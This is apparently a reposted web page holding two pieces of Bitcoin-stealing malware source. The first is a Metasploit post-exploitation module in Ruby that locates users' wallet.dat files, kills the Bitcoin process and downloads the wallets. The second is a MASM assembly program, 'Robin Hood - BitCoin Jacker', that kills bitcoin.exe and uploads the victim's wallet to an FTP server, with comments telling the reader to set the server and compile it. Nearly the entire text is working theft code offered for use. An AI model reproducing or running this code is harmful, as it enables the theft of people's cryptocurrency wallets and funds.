IMS:Robin Hood Bitcoin Jacker

http://dev.metasploit.com/redmine/projects/framework/repository/revisions/12993/entry/modules/post/windows/gather/bitcoin_jacker.rb

# $Id: bitcoin_jacker.rb 12993 2011-06-21 03:26:07Z hdm $

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) super( update_info( info, 'Name' => 'Windows Gather Bitcoin wallet.dat',
'Description' => %q{ This module downloads any Bitcoin wallet.dat files from the target system},
'License' => MSF_LICENSE,
'Author' => [ 'illwill '],
'Version' => '$Revision: 12993 $',
'Platform' => [ 'windows' ],
'SessionTypes' => [ 'meterpreter' ]
))
end

def run
print_status("Checking All Users For Bitcoin Wallet...")
os = session.sys.config.sysinfo['OS']
drive = session.fs.file.expand_path("%SystemDrive%")

if os =~ /Windows 7|Vista|2008/
@appdata = '\\AppData\\Roaming\\'
@users = drive + '\\Users'
else
@appdata = '\\Application Data\\'
@users = drive + '\\Documents and Settings'
end

get_users

@userpaths.each do |path|
jack_wallet(path)
end
end

def jack_wallet(path)
data = ""
filename = "#{path}#{@appdata}\\Bitcoin\\wallet.dat"
found = client.fs.file.stat(filename) rescue nil
return if not found

print_status("Wallet Found At #{filename}")
print_status(" Jackin their wallet...")

kill_bitcoin

begin
wallet = session.fs.file.new(filename, "rb")
until wallet.eof?
data << wallet.read end store_loot("bitcoin.wallet", "application/octet-stream", session, data, filename, "Bitcoin Wallet") print_status(" Wallet Jacked.") rescue ::Interrupt raise $! rescue ::Exception => e
print_error("Failed to download #{filename}: #{e.class} #{e}")
end
end

def get_users
@userpaths = []
session.fs.dir.foreach(@users) do |path|
next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
@userpaths << "#{@users}\\#{path}\\" end end def kill_bitcoin client.sys.process.get_processes().each do |x| if x['name'].downcase == "bitcoin.exe" print_status(" #{x['name']} Process Found...") print_status(" Killing Process ID #{x['pid']}...") session.sys.process.kill(x['pid']) rescue nil end end end end

http://forums.gothack.net/showthread.php?18-Bitcion-Stealer
http://illmob.org/Sources/RobinHood.html

; ::Click Here Download Source Here::
; Robin Hood - BitCoin Jacker
; by [ill]will
; steal from the rich and give to the poor
; by dumping the wallet to "public" ftp
;
; Send Me Money if it makes you rich :D
; 14P9t8ceqRzvJ4KhMWnjKQ4TwcLxWwk7j4
; 'randomize' proc found somewhere on the net
; ftp.microsoft.com does not let you upload files
; so change the info and compile with MASM
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

include \masm32\include\masm32rt.inc
include \masm32\include\wininet.inc
includelib \masm32\lib\wininet.lib

FTPit PROTO :DWORD,:DWORD,:DWORD
KillMe PROTO :DWORD
Randomize PROTO
Random PROTO :DWORD
ThePort equ 21

.data
ftpsite db "ftp.microsoft.com",0 ;change the server
Username db "anonymous",0 ;change the username
Password db "bitcoin@microsoft.com",0 ;change the password
szTheVictim db "bitcoin.exe",0
RandWallet db "%s-wallet.dat",0
AppData db "AppData",0
wallet db "%s\Bitcoin\wallet.dat",0
random_seed dd ?
res dd 0
sFmt db '%u',0
sBuf db 10 dup(0)

.data?
buffer db MAX_PATH dup(?)
WalletPath db 256 dup(?)
WalletFTP db 256 dup(?)
szBuffer db 256 dup(?)

.code

start:

invoke KillMe, addr szTheVictim ;kill the bitcoin process
invoke Randomize ;generate a random number
invoke Random,9999999
mov res,EAX
invoke wsprintf,ADDR sBuf,ADDR sFmt,res ;append it to our ftp upload filename
invoke wsprintf,addr WalletFTP,addr RandWallet, addr sBuf ;ex: 9586293-wallet.dat

invoke GetEnvironmentVariable, addr AppData, addr buffer, sizeof buffer ;get the %AppDATA% folder
invoke wsprintf,addr WalletPath,addr wallet, addr buffer ;append the bitcoin wallet

invoke FTPit, addr ftpsite, addr WalletPath,addr WalletFTP ; send that shit to a public ftp
invoke ExitProcess, 0

FTPit PROC FTPserver:DWORD, lpszFile:DWORD, lpRemoteFile:DWORD
local hInternet:DWORD
local ftpHandle:DWORD
local context:DWORD
local InternetStatusCallback:DWORD
invoke InternetOpen,NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hInternet, eax
invoke InternetConnect,hInternet,FTPserver,ThePort ,\ ;if different port change INTERNET_DEFAULT_FTP_PORT to port #
ADDR Username,ADDR Password,INTERNET_SERVICE_FTP,\
INTERNET_FLAG_PASSIVE,ADDR context
mov ftpHandle,eax
invoke FtpPutFile,ftpHandle,lpszFile,lpRemoteFile,FTP_TRANSFER_TYPE_BINARY,NULL
invoke InternetCloseHandle,ftpHandle
invoke InternetCloseHandle, hInternet
ret
err:
invoke GetErrDescription,eax
ret
FTPit endp

Random proc dwBase:dword
push ebx
mov eax,dwBase
xor ebx,ebx
imul edx,random_seed,08088405h
inc edx
mov random_seed,edx
mul edx
mov eax,edx
pop ebx
ret
Random endp

Randomize proc
invoke GetTickCount
mov random_seed,eax
ret
Randomize endp

KillMe proc szFile:dword
LOCAL Process:PROCESSENTRY32

mov Process.dwSize, sizeof Process
invoke CreateToolhelp32Snapshot, 2, 0
mov esi, eax
invoke Process32First, esi, addr Process
@@loop:
invoke lstrcmpiA,szFile, addr Process.szExeFile
test eax, eax
jnz @@continue
invoke OpenProcess, 0001h, 0, Process.th32ProcessID
invoke TerminateProcess, eax, 0
@@continue:
invoke Process32Next, esi, addr Process
test eax, eax
jz @@done
jmp @@loop
@@done:
invoke CloseHandle, esi
ret
KillMe endp

end start

IMSIDE7ADE1ED317F5048EB80799AB02FAC8C3391FD46